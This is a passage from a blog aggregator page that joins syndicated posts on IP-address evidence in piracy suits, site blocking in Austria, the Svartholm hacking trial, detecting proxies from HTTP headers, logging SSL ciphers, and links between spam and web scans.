For example, instead of quoting what an expert says about the government IP address, she could simply report the IP address. If it’s “75.748.86.91”, then we can judge for ourselves whether it’s the address of a government computer. That’s important because nobody I know believes that this would be a smoking gun — maybe if we knew more technical details she could change our minds.

Maybe that’s in her book, along with pictures of the offending cable attached to the FiOS ONT, or the pictures of her screen deleting at “hyperspeed”. So far, though, none of those with advanced copies have released these details.

Lastly, she’s muzzled the one computer security “expert” that she named in the story so he can’t reveal any technical details, or even defend himself against charges that he’s a quack.


Attkisson’s book isn’t out yet. The source material for this post if from those with advance copies quoting her [1]][2]. But, everything quoted so far is garbled technobabble from fiction rather that hard technical facts.

Disclosure: Some might believe this post is from political bias instead of technical expertise. The opposite is true. I’m a right-winger. I believe her accusations that CBS put a left-wing slant on the news. I believe the current administration is suppressing information about the Benghazi incident. I believe journalists with details about Benghazi have been both hacked and suppressed. It’s just that in her case, her technical details sounds like a paranoid conspiracy theory.

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyer’s Club LLC (DBCLLC) requires a minimum of ‘difficult’ since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defense to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright
owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China“. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned since I cannot identify individual users. However, the proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify who’s request is being relayed. This added information is stuffed in HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from that contained the HTTP header “X-Forwarded-For:″. If I were to ban the user, then I would ban “”, since that system connected to my server. However, is and is part of a proxy network. This proxy network identified who was relaying with the X-Forwarded-For header. In this case, “” is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.

In some cases, I see the direct connection address also listed as the relayed address; it claims to be relaying itself. I suspect that this is cause by some kind of anti-virus system that is filtering network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123″. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with their own proxy identifier. Fortinet’s software adds in a “X-FCCKV2″ header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5″ says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.

Similarly, Facebook can relay network requests. These appear in the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook being use as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from German). However, without the official header, would I choose Spanish from Latin America (“es-LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of those other fields? (Fortunately, in the real world these would likely all be the same. And you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL firedrill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. If you decide to turn off SSLv3 or not depends a lot on who needs it, and it is an important answer to have ready should tomorrow some other cipher turn out to be too weak.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variable [1] . For example:
CustomLog logs/ssl_request_log %t %h {User-agent}i%{SSL_PROTOCOL}x %{SSL_CIPHER}x

Logs SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add User-Agent and IP Address (as well as time stamp).

In nginx, you can do the same by adding$ssl_cipher $ssl_protocolto the log_format directive in your nginx configuration. For example:

log_format ssl $remote_addr $http_user_agent $ssl_cipher $ssl_protocol

Should give you a similar result as for apache above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With t-shark, you can actually get a bit further. You can log the client hello with whatever ciphers the client proposed, and the server hello which will indicate what cipher the server picked.

tshark -r ssl -2R ssl.handshake.type==2 or ssl.handshake.type==1 -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect Real Data as to what ciphers are needed, but you can also look for anomalies. For example, user agents that request very different ciphers then other connections that claim to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign for an SSL downgrade attack? Or an attack tool using and older SSL library…


Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

stop-blockedWhen copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe and living proof that while The Pirate Bay might the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites, and Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month but the Hollywood affiliated group has now admitted that they’ve had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Using a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sector, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally more broad than those in the UK, affecting the country’s eighth largest service providers and affecting around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” featuring good and bad sides, Müller says that when ordering website blocks the courts will always appreciate the right to freedom of expression.

“But there’s no human right to Bruce Willis,” he concludes.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

gottfridThe hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is most well known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. Danish language publication, which has provided good coverage of the whole trial, reports that deputy prosecutor Anders Riisager used an analogy to describe their position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third-parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid’s] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SDcard key, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing on there of significance. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to be investigated,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I have averaged 4-8 spam messages per day without using any kind of mail filters. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has their list acquired by spammers, then I know which server caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shutdown. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different dnsbl sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks) and 70% of the time they are already associated with spam.

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates largest number of network attacks, it is really from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 counties that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: – and – Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here’s the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0” and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

By actively blocking the initial bellwether network scans, I have seen that it dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology from at In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment-spam, and searching for network addresses.

However, FotoForensics and are very small web sites compared to most other online services. Any impact from my own blocking is likely to be insignificant across the whole world. However, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks, and systems that generate spam emails. If big companies temporarily block access when a hostile scan is detected, then the overall volume of spam across the world should be rapidly reduced.

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact […]

The post IPFlood…

Read the full post at